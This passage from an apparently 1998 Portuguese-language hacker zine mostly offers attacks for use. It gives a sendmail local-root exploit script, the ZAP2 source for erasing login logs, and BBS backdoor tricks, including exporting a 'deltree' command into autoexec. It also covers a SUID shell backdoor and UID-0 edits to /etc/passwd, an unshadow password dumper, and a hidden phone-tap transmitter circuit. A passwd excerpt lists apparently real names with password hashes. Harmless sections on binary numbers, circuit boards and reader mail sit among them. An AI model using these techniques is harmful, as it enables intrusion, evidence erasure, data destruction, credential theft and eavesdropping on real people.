jah to de saco cheio. Aki vai um bug do sendmail 8.73 e 8.83. Rode o script
abaixo. Vc vai cair no diretorio /tmp. De um ls -l. Se tiver um arquivo SUID 
sh, digite whoami. Se vc nao for o root execute o arquivo ./sh, pronto...

sm.sh
-- cut here --
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c

cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
cd /tmp
sh
-- cut here --

OBS: Depois nao esquea de dar um chmod +x sm.sh pra executa-lo...



   APAGANDO SEUS RASTROS
  -=-=-=-=-=-=-=-=-=-=-=-

   Bom, depois, se vc conseguir pegar root, vc deve dar uma vasculhada pelo
sistema, afim de encontrar os arquivos de log, pro sysadmin nao saber quem
esteve lah, ele pode descobrir q alguem invadiu o sistema, mas nao quem...
   Para isso, existem alguns programas q apagam os arquivos pra vc. Mas antes
de usar algum programa, procure os arquivos, pois antes de compilar, vc tem
que modificar a fonte e recompila-lo, agora com o caminho dos arquivos. Ex.:

#define WTMP_NAME "/usr/adm/wtmp"

   Ai vai a fonte do programa ZAP:

z2.c

-- cut here --
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
 
int f;
 
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;
 
  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}
 
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;
 
    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
 
     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
     if ((pwd=getpwnam(who))!=NULL) {
 
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
 
    } else printf("%s: ?\n",who);
}
 
main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}
-- cut here --



   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                            04  -  BACKDOORS
                           -=-=-=-=-=-=-=-=-=- 


- Backdoor em Q-A
Facam um programinha ou um questionario bem legalzinho em q-a. E de um jeito
de fazer com q o sysop burrinho instale ele na bbz. Se o cara for bem idiota,
ele nem vai olhar o codigo do q-a. O arq com os comandos q-a estao na hp da
hack n' phreak.

- Backdoor por infectacao de arqs
Peguem algum DSZ infectado ou arrumem em alguma bbz um trojan maker para ra.
Com eles vcs podem arrumar acesso de sysop. Eh so mandar para o sysop como
no item acima.

Pronto. Agora vc ja tem o acesso de sysop na bbz. E agora? vc ja pegou todos
os arqs interessantes da bbz? Vamos fude-la agora.

Va ao menu de msgs e mande uma msg para vc mesmo e com o corpo da msg com
comandos DOS (algo tipo: deltree/y c:\*.*).
Agora, va ao menu novamente e leia sua msg. Vc vai perceber algumas opcoes
a mais (ja q vc esta com nivel de sysop). Vc nao vai usar todas elas, somente
a opcao X (export). Nela vc pode "exportar" o texto da msg para qualquer arq
do hd do cara! Mande entao exportar sua msg para o autoexec do cara!

Pronto, agora a bbz escrota nao existe mais.




Vc ja deve ter acessado alguma bbz q use o wgm. Aquelas bbz fraquinhas onde
os lamahs acessam por modo grafico no ruindows e podem acessar inet.
Bom... esse WGM eh bem seguro e muito dificil de se entrar. A unica vez q eu
consegui entrar foi descobrindo o passwd do sysop. Mas ha uma luz no fim do
tunel! Apesar da seguranca, essas bbz tem uma falha: O sysop. Ta... e como
explorer esse BUG???
Nessas bbz, eh possivel serem confecionados aplicativos em VB3. Olha ai
a nossa salvacao! O problema eh q eu ainda nao tenho a listas dos arqs ou os
VBXs q se devem usar para fazer esses programas.=20

Contudo, peco a vcs, que deem um jeito de arrumar o WGM SERVER. Com isso,
vamos poder descobrir os segredos dessa "falha". Quem tiver a possibilidade,
mande para nos! Vamos ter o prazer de distribuir os Backdoorz feitos para o
WGM.
                                 

   1998, ShK - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                  05  -  COMPLEMENTANDO OS NUMEROS BINARIOS
                 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


      Computadores pessoais como os baseados nos microprocessadores Intel 8088
e 80286 (MUSEU :-), sao PCs de 16bits. Isto significa que podem trabalhar com
numeros binarios de ate 16 casas ou bits, o que, traduzido para numeros deci-
mais equivale a 65.536. Se a opreracao exigir um numero superior a esse, o PC
precisa, em primeiro lugar, quebrar esses numeros em componentes menores,
realizar a operacao em cada componente e entao recombinar os resultados em uma
unica resposta. Os PCs mais comuns, baseados nos microprocessadores Intel
80386 e 80486, sao computadores de 32bits, ou seja, podem manipular numeros
binarios com ate 32bits - o equivalente a notacao decimal 4.294.967.296.
A habilidade em trabalhar com ate 32bits por vez torna esses PCs mais rapidos
do que os de 16bits.

Numero Decimal       Numero Binario

          0			   0
          1          1          <----- Note que como a sequencia vai mudando
          2          10                a cada quatro numeros binarios e vai 
          3          11                repetindo os numeros apos isso... soh
          4          100               se bota o numero 1 na frente de todos.
          5          101            
          6          110
          7          111
          8          1000
          9          1001
          10         1010
          11         1011
          12         1100
          13         1101..........


      Os transistores nao sao utilizados somente para gravar e manipular nume-
ros. Os bits podem tambem, significar verdadeiro (1) ou nao verdadeiro (0).
As combinacoes dos transistores em varias configuracoes recebem o nome de
portas logicas, quando estao dispostas em arranjos (arrays) sao chamadas de
half-adders (somando parciais), que por sua vez sao combinadas em full-adders
(somadores completos). Mais de 260 transistores sao necessarios para criar um
somador completo (full-adder) que possa gerenciar operacoes matematicas para
numeros de 16bits.
     Alem disso, os transistores tornam possivel que uma pequena quantidade de
corrente eletrica controle outra corrente mais forte - do mesmo modo que a
pequena quantidade de energia necessaria para acionar um interruptor de parede
pode controlar a energia mais potente que vem atraves dos fios ate a lampada.


   1998, HaCk-MaN - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                    06  -  BACKDOOR SH: by GhOsT InVaDeR
                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  


Seguinte, eu nao acho que backdoor (porta dos fundos ) seja a melhor maneira
de definir esta "tatica" que irei falar, mas tb nao ah outra melhor.
Bom, o maior desafio de um hacker eh conseguir pegar root em um sistema e
poder fazer simplesmente ALL.
Mas da ateh pena em saber que depois voce nao podera voltar e conseguir o
acesso root novamente a nao ser que voce instale uma boa backdoor.
Todos sabemos que cada usuario tem uma shell no sistema Unix ou Linux, ate
mesmo o root.
Muitas pessoas que frequentam o irc pensam que shell e apenas uma conta
que da acesso a telnet.
Resumidamente pode ate ser isso, mas vai muito alem desta definicao o poder
da shell.
O arquivo shell fica a maioria das vezes no diretorio /bin/sh e
define o UID, GID, etc do usuario.

Ex:
Voce conecta com um login= james  senha=banana.
Entao automaticamente a shell do usuario eh executada e o sistema identifica
o ID do usuario e que tipo de acesso e permissao ele tem.
Digamos entao que eu quero saber o id deste usuario.
Entao eu digito id

$ ID
james UID=10156 GID=4 bla bla bla bla bla bla bla


Putz, com esse id ele nao pode acessar quase nada no sistema.
(Lembrando que quanto maior o UID menor sao suas permissoes no sistema)

Agora digamos que voce conecta como root.
O esquema eh o mesmo, o sistema executa o /bin/sh e identifica qual seu
acesso e que permissao ele tem.
No caso, total.
Mas digamos que voce deseja conferir o id.
Entao digite no prompt:

$ ID
root UID=0 GID=0 bla bla bla bla bla bla bla

Ai voce pensa:
__Ahhhh, o esquema ta todo naquele arquivo sh que fica no /etc.

Isso mesmo.
Agora, o que isso tem a ver com backdoor??
Bom, supondo que voce esteja com acesso root, siga esses passos:


1) Escolha um diretorio nao suspeito ou crie um subdir.

2) Copie o /bin/sh pra dentro dele
obs: de preferencia oculto, salve com o ponto na frente .sh

3) Agora de permissao a ele para que qualquer usuario possa executa-lo
   use: chmod 777 .sh

4) Pegue o /etc/passwd (voce tambem pode criar um usuario com shell no sistem
a, mas eh muito arriscado)

5) Saia do sistema e desencripte o passwd.

6) Escolha um usuario qualquer que tenha shell e volte no sistema

7) Execute o .sh que voce copiou e bingo!! voce tem id de root

8) Digite ID para conferir seu uid.


Simples mas eficaz.
Ahh, voce nao entendeu?
entao vou passar o que fazer em comandos:



COMO ROOT FACA:

$ cp /bin/sh /tmp/.sh

$ chmod 777 /tmp/.sh

$ cat /etc/passwd (ou crie um usuario: adduser login_cara)

$ logout


desencripte uma senha ou entre com a conta que voce criou.


COMO USER COMUM FAA:

$ ID
james UID=10156 GID=4 bla bla bla bla bla bla bla

$ cd /tmp

$.sh

$ ID
root UID=0 GID=0 bla bla bla bla bla bla bla

BINGO!!
Agora voce tem o id de root.

Ah outra forma de usar o UID e GID.
Digamos que o provedor que voce esteja eh bem grande e contem uma vasta
lista de usuarios que contem shells em seu passwd.
Agora fica facil, basta editar o /etc/passwd e mudar o UID e GID de algum
usuario para 0.

Obs: Nao esqueca que esse metodo eh arriscado, e que se o usuario que voce
escolheu mudar a senha voce nao podera voltar mais.

Obs2: Confira se nao ha um backup do passwd, geralmente -passwd, passwd-,
.passwd etc...

Vou supor que la tenha o editor pico:

$ PICO /etc/passwd

                    ______mude aqui
                    | |
pparo:CMjZikulXQqK.:0:0:PAULA DORNHOFER PARO:/home/EE97/pparo:/etc/sh
goroh:grwta/Jaq5vpg:10272:1011:Andre de Oliveira Fernandes - 900160:/home/EC90/goroh:/bin/csh
teixeira:bNTBqVVSd5zCI:10495:1011:Gustavo F. Teixeira:/home/EE93/teixeira:/bin/csh
rodolfon:0AzVjyyD40TFU:10177:1011:Rodolfo Jose Leite Netto:/home/EE92/rodolfon:/bin/csh
isa9000:yOs699b9JJ4I6:10632:1011:Isabella Sousa Carreira:/home/EE93/isa9000:/bin/csh
daniloa:sfsS0gQr.J.zM:9399:1011:DANILO ANGELO - 950424:/home/EC95/daniloa:/bin/csh
alcaraz:QswOnrLt/sn62:10209:1011:Carlos Alberto Duarte Alcaraz:/home/EE92/alcaraz:/bin/csh
pinho:GHV/.J8MdGdBU:10256:1011:Fernando Correa de Araujo Pinho:/home/EC91/pinho:/bin/csh
hideo:lLt//EJT7klnE:10186:1011:Edson H. Fujishima - 930187:/home/EE93/hideo:/bin/csh
tatiana:zCr9VVfVXDLpM:10750:1011:Tatiana Steckelberg Iwashima:/home/EC93/tatiana:/bin/csh
mauric0:rPmUtvNcTtZt2:10190:1011:Mauricio Dester:/home/EE87/mauric0:/bin/csh

:aperte ctrl + x pra sair e salve quando solicitado.

$ logout

agora volte com o login e a senha deste usuario que voce alterou o id
que voce ja entra com ID 0 (acesso total)



GhOsT InVaDeR (ghostin@freemail.globalsite.com.br)


   1998, GhOsT InVaDeR - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                    07  -  PLACAS DE CIRCUITO IMPRESSO
                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


   Bom, o q me levou a escrever essa materia foi o fato de q eu ja to cansado
de ficar falando sobre boxes sem dar o projeto de uma BOX interessante, pen-
sando nisso, resolvi passar nesta ediao, uma box q transmite as conversas
telefonicas. Eh uma placa pequena, q vc deixa dentro do fone, eh isso mesmo,
dentro do fone!!! Mas tem aqueles q nunca tiveram um contato aprofundado com
a eletronica, entao, pensando nessas pessoas q eu vou escrever isso aki.
   Ninguem precisa saber o q um capacitor de 100uF faz para montar esses pe-
quenos projetos, basta seguir todas as indicaoes do diagrama e montar adequa-
damente para ele funcionar, mas para a placa ficar melhor ainda, eu sugiro q
vc treine um pouco sua habilidade de soldar, pois alem de seu trabalho ficar
melhor, a box q ensino, eh muito pequena, e uma solda mal-feita pode danificar
todo o circuito, pra comeo de conversa vc vai precisar de:

   - Um soldador (aquele ferro q esquenta)
   - Solda (aquele ferro mole q vem enrolado)

   Isso eh essencial para vc comear uma pequena soldagem. Eh logico q vc tmb
vai precisar de alguma coisa pra soldar, pegue uns fios velhos para praticar.
Pronto, coloque o soldador na tomada e espere esquentar. Depois de um tempo
ele vai estar bem quente (cuidado pra nao fazer uma tatuagem) pegue a solda
e aproxime do local a ser soldado, entao com a ponta do soldador, encoste na
solda, para q ela derreta e entre em contato com o local desejado, no nosso
caso, onde os fios se unem. Ok, vc precisa de um diagrama:




          Soldador  -   \\       /  - Solda
                         \\    /
                          \\ /
               =========----*----============ - fios
                           |
                        Solda feita


   Ahm, eu sei o diagrama ficou uma merda e nao ajudou em nada, pelo menos
ocupa um espacinho, hehehe...
   Bom, voltando a aula, nao deixe a solda pingar na mesa ou em vc, ela eh
quente tmb. Ela seca rapido em questao de segundos.
   Para a soldagem de componentes na placa, o esquema eh o mesmo, vc poe os
terminais do componente nos seus devidos buracos e solda, o que sobrar vc cor-
ta fora, nao puxe a perninha fora, corte com um alicate de corte...
   Soh um lembrete: Na hora de soldar o componente, nao solde fora da trilha
nem apenas o terminal, solde de uma maneira em q o terminal fique bem conecta-
do a trilha.
   Sobre soldagem eh soh isso, nao eh nada teorico, precisa de pratica...
   Vamos a parte da confecao da placa:

OBS.: Muito cuidado ao usar o ferro, lembre-se q ele se aquece em temperaturas
      acima dos 300 graus Celsius


   CONFECCIONANDO A PLACA DE CIRCUITO IMPRESSO

   Antes de tudo vc precisa comprar a placa, ela tem um dos lados cobreados e
pode ser encontrada facilmente em casas de eletronicos, peca um tamanho ade-
quado para a montagem q vc vai realizar.
   Agora o nosso proximo passo eh fazer as trilhas para a eletricidade passar
por onde ela deve. Vc pode ver em qualquer livro ou revista como ela eh, vou
tentar fazer um diagrama, mas eh ruim:

 Placa de Circuito Impresso:

  ______________________
 |                      |     OBS.: Pra ninguem vim me perguntando o q essa
 |  o----\    o o o o   |           placa faz: Ela eh soh um EXEMPLO, nao faz
 |  o--\ |      |       |           nada, tanto q estah incompleta...
 |     | \----o o o o   |
 |     \---o  |   |     |
 |       o----/   |     |
 |         o------/     |
 |______________________|

   Onde:

   o = buraco onde passa o terminal do componente (Ilha)

   / = curva

   \ = curva

  -- = trilha


   Bom, em varios lugares existem uns decalques pra vender para fazer as pla-
cas, no meu caso, eu uso um metodo mais simples: Tiro um xerox ou desenho a
placa no tamanho original (que ela devera sair) e com um estilete, corto as
trilas (do papel, eh claro) para q fique um molde, entao coloco em cima da
parte cobreada da placa, fixo com durex se necessario, e passo o esmalte...

   Esse eh um metodo q eu utilizo, se vc quiser utilizar um outro problema seu
Bom, vamos comear entao. Quando vc tiver em maos a chapa cobreado, serre-a de
acordo com suas necessidades, depois de um jeito nela para q fique bem brilhan
te, passe um bombril, ou coisa assim. Depois q ela tiver bem bonitona, tenha
em maos o molde, ou o decalque, ou a merda q vc vai usar pra marcar as trilhas
Eu recomento q vc marque os locais onde vc tem q fazer o furo, fica mais facil
depois. Entao passe o esmalte, ou o decalque, depois de a placa ter suas tri-
lhas marcadas, vc pode preparar o pecloreto para deixar ela lah. Faa isso:
   Compre um pote de Percloreto de Ferro, ou po de percloreto, e dissolva em
agua, dissolva na quantidade de agua q ta marcada na embalagem do po. Dissolva
numa bacia, ou outro lugar para colocar a placa. Nao se preocupe se colocar
percloreto demais, ele pode ser usado novamente. Depois q vc colocar o po vai
ocorrer uma reaao quimica, cuidado pra nao respirar o vapor q vai sair de
lah, pois eh toxico, e faa isso ao ar livre, nao deixe nenhum material meta-
lico entrar em contato com o vapor, para evitar a corrosao. Depois q vc fez
a mistura, coloque a placa lah dentro, se quiser amarre um fiozinho, eh mais
facil de tirar depois. Para dissolver mais rapido, fique balanando a bacia,
ou puxe o fio pra lah e pra cah...
   Deixe lah ate q o cobre saia todo, ficando apenas as partes q vc marcou,
seja com o decalque ou com o metodo q vc usou. Nao boie, nao deixe a placa por
muito tempo, senao jah era o seu projeto. Nao estranhe se quando vc tirar a
placa ficar meia rosada. Depois vc pode lava-la com agua e guardar o perclore-
to num pote qualquer, desde q esteja bem protegido. Depois de lavar a placa,
vc pode tirar o decalque com bombril, ou se vc usou esmalte, tire com um algo-
dao e acetona. Agora soh falta furar a placa e pronto... Na hora de furar,
faa o furo ideal, nao muito largo, o essencial pro terminal passar...
   Aih estah sua placa de circuito impresso...

OBS.: Guarde a sobre do percloreto num recipiente PLASTICO, pois ele eh alta-
      mente corrosivo ao metal


   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                    08  -  BOX - TRANSMISSOR FM OCULTO
                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  

   Ai estah um projeto de uma box para linhas NACIONAIS, q transmite conversas
telefonicas em FM. Daih vc pergunta, o e q tem de tao incomun nisso? Incomum
eu nao diria, eu diria interessante. Essa maravilha opera na faixa dos 60 a
100 Mhz, transmitindo todas as conversas num raio de + ou - uns 40 m. E o
melhor de tudo, ela vai escondida dentro do telefone...
   E tem mais, nao precisa de pilhas, eh alimentada pela propria linha telefo-
nica!! Ohh.
   A unica desvantagem desse circuito eh q a placa de circuito impresso tem q
ser pequena o bastante para entrar dentro do fone, nos padroes, vc podera fa-
ze-la no maximo com 2,3 cm de largura, portanto, se vc nao tem muita pratica
na soldagem e confecao de placas de circuito impresso, nem tente fazer esse
projeto, senao eh um desastre na certa...
   Outra desvantagem eh q o som do telefone "boxeado" fica mais baixo, mas
nada q interrompa o processo. A instalaao do aparelho eh outra vantagem, vc
precisa apenas abrir o fone, aquele q vai em cima do gancho, e prender os
jacares nos terminais, sem precisar observar a polarizaao...

   MATERIAL NECESSARIO:

   Q1 - BF494 - transistor NPN de RF
   D1, D2, D3, D4 - 1N4148 - diodo de uso geral

   (1/8 W, 5%)
   R1 - 1K ohm
   R2 - 1,2 K ohms

   C1, C3 - 1 nF - ceramico
   C2 - 10 pF - ceramico

   L1 - bobina pequena


   DIAGRAMA:



            1k
   o-------|||||------         |-----------    ------o---------
jacare 1              |        |          |   /      |        |
                      |        |          |   \      |C2      |
                     /o\       |          |---o     ---10pF   |
                   D1  D2      |              \     ---       |
               ----o    o------o           L1 /      |        |
              |    D3  D4      |              \      |        |
              |      \o/       |              |      |        /
              |       |        |              o-------------|/ Q1
              |       |       ___                           |\ BF494
              |       |       ___ C1                           \
  o--------------------        |  1 nF                         |
 jacare 2     |                |                               |
              |                |               ----------------o
              |                |               |               |
              |                |              ___             == R2
              |                |              ___ C3          == 1K
              |                |               |  1 nF         |
              -----------------o---------------o----------------

   o = ligaoes

   O diagrama tah meio complicado mas eu acho q dah pra entender. Nao vai dar
pra fazer a placa de circuito impresso em ASCII, se vc tiver mais experiencia
vai conseguir fazer uma naboah, mas se vc eh inexperiente, aguarde q eu colo-
co um GIF na home page do PHR pra Download. Se vc tiver acesso a componentes
SMD eh melhor ainda, a placa fica bem menor, mas se vc nao tiver, dah pra
construir tranquilo assim. L1 eh a bobina. Para fazer a bobina escolha um fio
esmaltado 26 a 28, com diametro de uns 5 mm. Para faixas em FM faa com 2+2
espiras. As saidas podem ser feitas com fios de uns 10 cm, com jacares, ou ou-
tra coisa q prenda bem, para nao causar nenhuma interferencia na transmissao
ou mesmo pra nao se soltar com o balano do fone, principalmente se alguem
deixar cair no chao. Para testalo, pode testar em seu telefone, ou com tres
pilhas (4.5 V). Pegue o receptor q vc vai usar, pode ser um radio portatil co-
mum e ajuste numa frequencia entre 60 e 100 Mhz. Fique apertando e soltanto as
espiras para ajustar a frequencia, enquanto tenta achar com o receptor. Depois
de achar a frequencia certa, cuide para nao mexer a bobina, e marque em um pa-
pel ou coisa assim. Depois eh soh instalar no telefone q quiser, e abracadabra
pronto, lembre-se q ele vai transmitir sempre q o fone for tirado do gancho.


   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                     
                            09  -  SHADOW PASSWD
                           -=-=-=-=-=-=-=-=-=-=-=-  

Bom... o que vou falar e sobre uma coisa muito lamer e que todos DEVERIAM
saber..... SHADOW! Aparece cada um com uns arquivos falando que tem as senhas
e que e hacker... o arquivo de senhas (geralmente chamado de passwd) e assim:

login:senha:id:uid:comentario:command.com

Quando voce acha um arquivo que tenha no lugar da senha um monte de LETRAS,
voce teve muita sorte! Ou o provedor  uma droga ou voce pego um root muito
lamer! Ficaria mais ou menos assim um arquivo SEM shadow:

root:N48dydkljSf3:0:0::/bin/sh

Bem... se voce arranjou alguma coisa assim.. procure um desencriptador LOGO!
Uns do que eu conheco e: Cracker Jack 1.4 (Windows), Jhuck (Windows) e mais
uns que eu nunca vi funcionar direito! Pra conseguir eles... e so andar um
pouco pelas HP's hackers por ai! Mais caso voce tenha achado um arquivo passwd
da seguinte forma:

root:*:0:0::/bin/sh
root:!:0:0::/bin/sh  (Uma dessas formas, existem varias... essas sao comuns)
root:X:0:0::/bin/sh

Se voce achou um arquivo com essas formas acima mais tem acesso nesse provedor
por telnet... ai a coisa muda! Tem um monte de geito de "tirar" o shadow dos
arquivos... e so ter vontade de procurar que voce acha por ai! Um muito
simples que funciona mais ou menos bem e o UNSHAD. Voce encontra ele por ai
em qualquer lugar! Aqui tem uma cpia em C. Voc deve usar o compilador c(cc)
do Unix para compilar o unshad e usa-lo digitando unshad >> arquivo_senhas.

        cc -o unshad unshad.c
        unshad >> senhas.dat

        No caso, as senhas encontradas sero armazenadas no arquivo senhas.dat

--------------------------------UNSHAD.C---------------------------------

     #include 

 

main ()

 

{

 struct passwd *p;

 

 while(p=getpwent ())

 

 printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,

  p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

 

}

----------------------------------------------------------------------




Mais e se voce nao tem acesso por telnet? Bom, com sorte voce acha um arquivo
passwd que tenha UM login com a senha unshadow. Desencripte ela e logue por
telnet! Geralmente as senhas usadas em log por FTP tem acesso em TELNET
tambem! Ai e fazer a festa!

Como esse assunto e muito lamer mais muitas pessoas nao sacam isso... paro
por aqui! Se a galera ajudar ae... continuamos no proximo zine com coisas mais
interessantes!!!!


   1998, SideW - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-




                        10  -  CORREIO DA GALERA
                       -=-=-=-=-=-=-=-=-=-=-=-=-=- 

   Aki estao alguns mails q recebi com o passar do tempo. Alguns eu jah
respondi antes, por e-mail, mas nao deu pra responder todos, portanto veja
a resposta agora...


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Bom, de novo , o mesmo merda de internauta volta a te ecrever, novamente
te pedidno ajuda. O que eu queria saber e pra que servem as green boxes 
?? Quais sao sua finalidades ?/ Estou te escrevendo isso pq eu arrumei 
um programa , como um nome babaca, chamdo phreakzoid, esse programa tem 
a capacidade de imitar atrves de sons a Silver, Red, Blue e a Green box. 
Li na sua zine sobre todas , menos a green !!
Sera que da para dar um ajudinha ?? Velue !!!
Se vc quiser este programa e so pedir !!! 

Muito agradecido.

obs: Eu tb arrumei um outro programa chamdo boxtone, mas eu ainda nao 
consegui descobrir a sua finalidade !!! Gostaria de saber se posso tomar 
a liberdade de te mandar este porgram, sao apenas 6 kb ! Para vc assim 
descobrir a sua funcao !!


RESPOSTA: Todas essas boxes q vc se refere nao funcionam aki no Brasil, 
          portanto, jah q vc eh begginer, comece estudando apenas as boxes   
          q funcionam aki no Brasil, o programa BoxTone, provavelmente eh um
          gerador de sons em varias frequencias, parecido com o BB q eu fiz,
          e estah na Home Page do zine. Mas pra nao dizer q nao respondi sua
          pergunta, a Green Box cria tres tons diferentes, o tom de COIN CO-
          LLECT, o de COIN RETURN, e o de RINGBACK...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


 olah...
    desculpe a invasao...

    serah que vc poderia me mandar textos sobre PGP???
    tipo... o que eh.. como usar... etc....

    sou totalmente leiga no assunto.. porem tenho grande vontade em
saber...


    agradeco...
    e aguardo noticias


    []s


RESPOSTA: Pode aguardar a ediao 04 q o Cebola vai fazer um tutorial sobre
          o PGP ok?


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Cara, achei legal o seu zine, contem informaes uteis e certas  dificil
achar na internet textos assim sou programador C , e gostei da seo sobre
virus, etc.

   Daniel. 

RESPOSTA: Ok, mas vc tem q agradecer ao Cebola e nao a mim, vcz devem mandar
          criticas e sugestoes das materias de seus respectivos autores...
          O mail do Cebola eh: cebola_br@hotmail.com


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Se vc quiser por um link da sua pgina na minha mande o endereo da sua e 
   se vc tiver o logo mande junto... 

   http://www.terravista.ciclone.com.br/areiasbrancas/1365/index.html 


RESPOSTA: Eh logico, pode por quantos linkz quiser...   

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Primeiro, parabns pela Zine. 10. .... 
   Eu queria saber uma coisa, qual o endereo do arquivo, 
   especificadamente, que eu nao achei nada lah. E tb, como eu posso 
   downloadar esse SO via NET se eu vi pra vender em dois CDs ? 


RESPOSTA: Sim, o Linux eh vendido completo em CD, mas se vc nao quiser comprar
          o CD pode pegar de graa em varios endereos, eh soh procurar:
          http://www.sunsite.unc.edu
          ftp://ftp.cdrom.com/pub/linux


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


ae, eu sou um leitor de seu zine, que por sinal  otimo e gostaria de 
   saber se vc tem endereos de mais zines 

   valeu ae 

   beakman 

RESPOSTA: Na HP do PHR tem tudo q eh zine...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


A a, bele? Cara eu tenho lido seu zine, achei 10 , mas tenho tido uns proble-
minhas quanto as dicas phreak. Posso me considerar um hacker de certa experi-
ncia, mas nuca me interessei por phreak. Agora v que tambm  muito loco.
Minha zica  com o lance dos cartes telefnicos. No consegui fazer funcionar
nada daquilo que vc indicou. Segui os passos e no deu nada certo. Ser que vc
pode dar um help?
  Valeu, meu nick  Cable Guy.


RESPOSTA: Poize, hehehe, aquelas merda nao funcionam mezmo... Mas pode crer
          cara, na proxima ediao (04 - Maro) vou colocar uma materia com
          as voltagens dos telefones a cartao, aguarde...


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


olah... 
como faco para conseguir as versoes anteriores do "Manual de 
Violao a Telefones Pblicos e Privados " ?????? 


obrigada 

   
RESPOSTA: Vc soh digita no Cade? Vai aparecer, mas eu nao recomendo as versoes
          anteriores, a unica diferena sao correoes, e tem as mesmas coisas
          das mais novas, algumas a menos, se vc tem a mais nova nao precisa
          da mais velha, eh igual...


   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Cara, 

Adorei o seu e-zine, e D +. Para mim que estou comecando agora (como vcs 
dizem sou um begginer), e' otimo. 
Mas voltando ao assunto do sbject, eu queria dar um toque em vcs: e sobre 
os americanos. 
Americanos somos todos nos que nascemos no continente chamado America. Os 
bundoes que nascem no pais Estados Unidos, sao ESTADUNIENSES. Claro que, 
